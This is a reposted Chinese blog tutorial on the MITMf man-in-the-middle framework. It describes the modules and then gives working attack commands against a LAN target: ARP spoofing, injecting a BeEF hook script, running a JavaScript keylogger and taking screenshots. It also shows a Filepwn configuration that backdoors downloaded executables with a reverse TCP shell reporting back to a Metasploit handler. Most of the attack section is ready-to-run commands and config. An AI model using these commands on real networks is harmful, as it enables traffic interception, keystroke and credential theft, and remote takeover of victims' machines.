渗透工具之mitmf 详解

最新推荐文章于 2024-05-17 09:34:12 发布
最新推荐文章于 2024-05-17 09:34:12 发布
阅读量5.2k 收藏 9
点赞数 1
分类专栏: kali 转载
转载 同时被 2 个专栏收录
15 篇文章 0 订阅
订阅专栏
kali
12 篇文章 0 订阅
订阅专栏

简介

mitmf是一个可用于中间人攻击的框架。它是基于代理工具sergio-proxy修改而来。

安装

最简单的按照 

sudo apt-get install python-nfqueue,pefile
sudo apt-get install mitmf*
pip uninstall twisted
wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
pip install ./Twisted-15.5.0.tar.bz2

https://github.com/byt3bl33d3r/MITMf 官方的按照方法如下

功能

sslstrip模块

这个我不多说大家也都能明白,默认是开启的状态。这里我尝试了用-d参数关闭了sslstrip,但是出现了无法使用的情况,应该是框架本身的bug。

Filepwn模块

主要作用是当被欺骗对象尝试下载文件时,首先对文件进行分析,对可执行文件(PE、ELF)进行后门注入,然后再给到被欺骗对象,这个下面我还会给出详细的说明。

Cachekill模块

清空客户端的缓存缓冲池,这个在我们需要重新注入一段js时是很有用的。这个功能还是非常有用的,关于用处,大家可以“渗透之缓存投毒”的文章,不细说。

Spoof模块

十分重要的一个模块,当我们使用MITM功能攻击欺骗时绝对是不能缺少的。其主要包括对ARP、ICMP、DHCP进行流量重定向(三种模式不能同时使用),手动指定iptables命令等,其他的规则文件(cfg文件)在主目录的config目录下,我们可以进行自定义配置。

BeefAutorun模块

该模块可以使框架可以连接到BeEF,BeEF的强大我想大家是有目共睹的。连接到BeEF之后就可以将MITM与浏览器渗透结合起来,功能自然更强大。

Replace模块

这个模块主要是可以对浏览内容进行替换,支持正则表达式。注意,这里模块默认情况下是强制刷新缓存缓冲池的,要想不改变缓冲内容,需要手动指定keep-cache参数。

Inject模块

可以向被欺骗者的浏览内容中注入各种猥琐的东西,比如js,html,图片等。

Browser Profiler插件

枚举被欺骗机器的浏览器插件。对于我们前期的信息收集阶段还是很有用的。

JavaPwn模块

可以通过向被攻击机器中注入jar使得浏览内容被毒化,和metasploit联合可以直接渗透机器拿到shell。

Javascript Keylogger模块

一个键盘记录js。

App Cache Poison

app缓存投毒。对于网页应用程序进行毒化处理,然后进行随心所欲的进行攻击测试。是Krzysztof Kotowicz的补充模块。

Upsidedownternet

恶搞模块,让浏览者的世界翻转。

攻击

1、注入到html

mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --inject --html-url http://192.168.1.107:3000/demos/butcher/index.html

2、注入js与beef-xss结合

mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --inject --js-url http://192.168.1.107:3000/hook.js

3、Screenshotter模块对目标浏览器进行截屏

mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --screen

4、恶搞功能: 它可以使目标浏览网页时,所有的图片都倒转 180度。

mitmf --spoof --arp -i wlan0 --gateway 192.168.1.1 --target 192.168.1.104 --upsidedownternet

5、keylogger使用

mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --jskeylogger

6、Filepwn模块

原理:ARP过程中如果探测到靶机有下载的活动,便劫持下载链接,首先将文件下载下来进行解包分析,如果是可执行文件就尝试注入后门,如果失败则重新打包。最后将文件输出给靶机由靶机进行下载。这里的文档支持zip和tar.gz格式解包,支持各种可执行文件。

打开msf,使用handler监听:

use exploit/multi/handler

set LHOST 192.168.1.152 

set LPORT 1447

run

在使用MITMf前我们需要对配置文件进行配置,注入信息配置如下(只列出作用位置)

这里写图片描述

[[[WindowsIntelx86]]]        
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND        
HOST = 192.168.1.152        
PORT = 1447        
SHELL = reverse_shell_tcp        
SUPPLIED_SHELLCODE = None        
ZERO_CERT = False        
PATCH_DLL = True        
MSFPAYLOAD = windows/shell_reverse_tcp

启动mitmf:

mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.169 --filepwn

这里写图片描述

这里写图片描述

赵一舟
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Nethunter MITMf的安装及使用(首发)
qq_60461486的博客
10-30 2876
MITMf是Nethunter中的一个集合攻击框架,集合了一些实用的中间人工具,可以通过MITMf来一键式地去执行它们,总之就是玩中间人的神器 既然是集合的工具,那依赖肯定是巨多的,所以想要使用它非常麻烦 其次,MITMf在Nethunter上的安装教程,网络上根本没有,油管上有几个,还是在kali上安装的,所以,这肯定是首发[滑稽] 好了,废话不多说了,我们直奔主题吧! 首先,先打开一个kali终端 然后,我们输入以下代码来安装’安装依赖’的工具 : wget https://pypi.python.o
monkey工具详解
02-24
Monkey是发送伪随机用户事件的工具;2.monkey在那里?在手机系统里,为了跟monkey进行通信,要借用adb3.什么是adb?AndroiddebgubridgemonkeyScript4.什么是MonkeyScript?monkeyScript是一组可以被monkey识别的命令...
强大的内网劫持框架之MITMf
weixin_30686845的博客
10-08 370
Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。默认在2.0上并未安装,在之前的版本有安装。 首先,我们先进行工具依赖包的安装。打开 terminal 终端,输入如下命令: apt-get install python-dev python-...
探秘DNSChef:网络侦查的利器
最新发布
gitblog_00017的博客
05-17 247
探秘DNSChef:网络侦查的利器 项目地址:https://gitcode.com/iphelix/dnschef 项目介绍 DNSChef是一个高级可配置的DNS代理工具,专为渗透测试者和恶意软件分析师设计。它扮演一个“假DNS”的角色,允许你在网络流量分析中对特定域名请求进行终止或拦截,而不是直接指向互联网上的实际主机。这个跨平台的应用程序提供了多种功能,使得在网络测试和安全研究中更加灵活。...
探索MITMf:一款强大的中间人攻击框架
gitblog_00071的博客
03-22 574
探索MITMf:一款强大的中间人攻击框架 项目地址:https://gitcode.com/byt3bl33d3r/MITMf 在网络安全领域,了解和掌握中间人攻击(Man-in-the-Middle, MITM)是至关重要的,而MITMf则是一款专为此设计的强大工具。这个开源项目由byt3bl33d3r创建,提供了一种灵活、高效的方式来实施MITM攻击,以进行渗透测试和安全研究。 项目简介 M...
MITMF安装与使用
hl1293348082的专栏
04-05 629
MITMF其实就是一个基于python编写的中间人攻击的框架,就好比metaspoit一样,无比强大且但十分易用。下面笔者就给大家介绍一下它有哪些用途,本文具有攻击性,大家最好在自己的实验环境中使用。 0x01. MITMF安装 安装依赖包以及mitmf,kali下使用如下命令: apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxm
HTTPS攻击原理与防御
hl1293348082的专栏
04-04 2250
0x00. HTTPS 简介 超文本传输安全协议( HTTPS )是一种通过计算机网络进行安全通信的传输协议。HTTPS 经由 HTTP 进行通信,但利用 SSL/TLS 来加密数据包。 HTTPS 开发的主要目的,是提供对网站服务器的身份认证,保护交换数据的隐私与完整性。 0x01. HTTPS 原理 1.首先是建立 TCP 的三次握手连接,连接建立之后由客户端向浏览器发起 https 连接请求。 2.连接请求成功之后,client 会发送自己所有支持的 ciphersuit ( 包括:对
Kali Linux渗透测试技术详解
02-19
《Kali Linux渗透测试技术详解.pdf》这篇文档主要介绍了 Kali Linux 是一款渗透测试工具,用于测试网络和系统的安全性。该文档涵盖了 Kali Linux 的各个方面,包括安装、配置、测试和安全性建议等。 该文档的核心...
Java开发工具配置详解
01-14
idea、JDK8、Maven、Tomcat、Git的配置与使用
JVM调优工具命令详解.pdf
07-25
JVM调优工具命令详解
局域网中间人:MITMf使用
dianyan5615的博客
01-14 94
  系统环境:kali   安装流程参考github官方地址:https://github.com/byt3bl33d3r/MITMf/wiki/Installation   安装相关依赖: apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev ...
内网渗透讲义
03-22
内网渗透讲义
中间人攻击之Cookie
03-24
某培训机构网课,平平淡淡,入门级别的东西
SSL工作原理详解
12-11
SSL工作原理详解
mitmf内网安全测试
11-03
内网渗透神器 再linux下运行 综合内网渗透几乎全部功能
使用kali里的dnschef进行DNS欺骗
qq_33163046的博客
06-06 4131
本文使用kali自带的DNSChef工具做DNS欺骗,工具成功生效了
Kali下安装MITMF时,"没有可用的软件包 libpcap0.8-dev,但是它被其它的软件包引用了"错误解决办法
bronze_s的博客
12-10 5261
在安装MITMF显示如下错误: 试了很很多方法,终于找到了一个可以用的办法: 1. apt-get update 2. root@kali:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxsl...
MITMf安装过程
joosonmao的专栏
06-05 4064
系统是MAC Mvericks 10.9.5 XCODE6.1 先用你的苹果账号登录苹果官方工具下载中心,我是从XCode菜单进去的,下载安装command_line_tools,然后看这篇文章http://www.freebuf.com/tools/45796.html装mitmf框架,遇到各种各样的问题,为了方便安装,我们最好把这几个工具都装了,pip ,wget,brew pip安装(pi
Nmap 操作指南1
08-03
"Nmap操作指南"是一篇关于Nmap渗透测试工具的操作与使用的指南。该指南的目的是帮助用户熟悉并掌握Nmap工具的功能和用法。以下是对该指南的具体内容进行总结。 首先,Nmap是一个功能强大的渗透测试工具,除了常见的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值